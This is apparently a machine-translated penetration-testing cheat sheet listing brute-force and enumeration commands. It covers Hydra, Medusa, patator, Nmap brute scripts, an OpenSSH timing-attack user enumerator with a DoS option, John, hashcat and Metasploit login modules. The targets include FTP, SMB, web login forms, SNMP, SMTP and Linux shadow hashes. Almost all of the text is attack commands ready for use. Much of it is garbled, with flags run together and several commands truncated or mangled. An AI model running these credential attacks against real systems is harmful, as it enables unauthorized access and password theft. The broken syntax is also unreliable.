Smb:
enum-d-u administrator-f passwords.txt server name
FTP:
Medusa-h ip.txt-u user.txt-p passwd.txt-m FTP
Hydra-l User name - p password dictionary - e ns-vv IP FTP
Hydra
Crack http-proxy:# Hydra-L admin-p pass.txt http-proxy://10.36.16.18cracked imap:# Hydra-L USER.TXT-P Secret10.36.16.18IMAP plain# Hydra-C Defaults.txt-6Imap://[Fe80::2c:31ff:fe12:ac11]:143/plaincracked cisco:# Hydra-P Pass.txt10.36.16.18cisco# Hydra-M Cloud-p pass.txt10.36.16.18cisco-enable crack https:# Hydra-m/index.php-l muts-p Pass.txt10.36.16.18https hack teamspeak:# Hydra-l User name-p password Dictionary-s port number-VV IP teamspeak
Web Form login hack get way submit, Hack Web login: # Hydra-l User name-p password Dictionary-t thread-vv-e NS IP http-Get/admin/# Hydra-l User name-p password Dictionary-t thread-vv-e ns-f IP http-Get/admin/Index.phppost Way to submit, Hack Web login (no verification code supported) Hydra-L admin-p Pass.lst-o ok.lst-t1-F IP http-post-form"/index.php:name=^user^&pwd=^pass^:<title>invalido</title>"Description: Username is admin, password dictionary is pass.lst, the cracked result is saved in Ok.lst,-T is the number of simultaneous threads is 1,-F is when a password is cracked to stop, IP is the destination IP
Http-post-form means the hack is a form password hack submitted using the Post form of HTTP.
The following parameter is the Name property of the corresponding form field in the Web page, and the following <title> is the return information hint that represents the error guess, which can be customized
Enumerate sequence attacks against OpenSSH users
Note: Enumeration of timing attacks ("enumeration Timing Attack") is a side channel attack/bypass Attack (Side channel Attack),
Side channel attack refers to the use of information outside the channel, such as the speed of encryption/decryption of the chip pin voltage/ ciphertext transmission of the traffic and channels, such as the way to attack, a word is described as "beat the bush." –
Osueta is a python2 script for timing attacks against OpenSSH, which can enumerate OpenSSH user names using time series attacks and, under certain conditions, DOS attacks on OpenSSH servers. # https://github.com/c0r3dump3d/osueta$./osueta.py-h 192.168.1.6-p 22-u root-d-v yes$./osueta.py-h 192.168. 10.22-p 22-d 15-v yes–dos no-l userfile.txt
Crack
Nmap-p 873--script rsync-brute--script-args ' rsync-brute.module=www ' 192.168.1.4 hack rsync
Nmap--script informix-brute-p 9088 192.168.1.4 informix database hack
Nmap-p 5432--script pgsql-brute 192.168.1.4 pgsql hack
Nmap-su--script snmp-brute 192.168.1.4 SNMP hack
NMAP-SV--script=telnet-brute 192.168.1.4 telnet hack
Enumerating Samba
Nmblookup-a Target
Smbclient//mount/share-i Target-n
Rpcclient-u "" Target
Enum4linux Target
Enumerate SNMP
Snmpget-v 1-c Public IP
Snmpwalk-v 1-c Public IP
Snmpbulkwalk-v2c-c Public-cn0-cr10 IP
# SMTP Burst (patator)
$ patator smtp_login host=192.168.1.129 user=ololena password=file0 0=/usr/share/john/password.lst $ patator Smtp_login host=192.168.1.129 user=FILE1 password=file0 0=/usr/share/john/password.lst 1=/usr/share/john/ usernames.lst $ patator smtp_login host=192.168.1.129 helo= ' ehlo 192.168.17.128 ' user=file1 password=file0 0=/usr/ Share/john/password.lst 1=/usr/share/john/usernames.lst $ patator smtp_login host=192.168.1.129 user=Ololena PASSWORD=FILE0 0=/usr/share/john/password.lst x ignore:fgrep= ' incorrect password or account name '
MD5 hack ( example : md5.txt file , MD5 hash without salt )
John-format=raw-md5-pot=./wordlist.pot Md5.txt
John-format=raw-md5-opencl-wordlist=wordlist.lst-rules:single md5.txt ( using GPU to speed up cracking )
Hash hack
Hashcat-m 400-a 0 Hash/root/rockyou.txt cracked Hash
Hack linux passwords
" /etc/shadow " "/etc/shadow"-i:digits-user:test1 user1 #遍历模式, All possible scenarios for using combination passwords
Parameters: All (0 to 8 characters long) Alpha (all combinations of letters 1 to 8 characters long) Digits (all combinations of numbers 1 to 8 characters long) Alnum (1 to 8 characters long all letters /-Show Hashes --restore hashes on the original basis to continue to crack (crack results appear question mark)
ZIP password hack:
(1) fcrackzip blasting: 4-41(wherein,-B blasting,-l description Password length,-u is a file,-V is verbose output,- c is the password dictionary type)
Oclhashcat
Whether it's a md5,mssql,sha1 or another hash, the cracked command is a,-m set Hash type
cracked WPAv2 Hash cudahashcat 2500 out . Hccap cracked NTLM hash cudahashcat +
Some blasting modules in the Metasploit
Auxiliary/scanner/mssql/mssql_loginauxiliary/scanner/ftp/ftp_loginauxiliary/scanner /ssh/ssh_loginauxiliary/scanner/telnet/telnet_loginauxiliary/scanner/smb/smb_ Loginauxiliary/scanner/mssql/mssql_loginauxiliary/scanner/mysql/mysql_loginauxiliary/ scanner/oracle/oracle_loginauxiliary/scanner/postgres/postgres_loginauxiliary/scanner/vnc/ vnc_loginauxiliary/scanner/pcanywhere/pcanywhere_loginauxiliary/scanner/snmp/snmp_login
Brute Force hack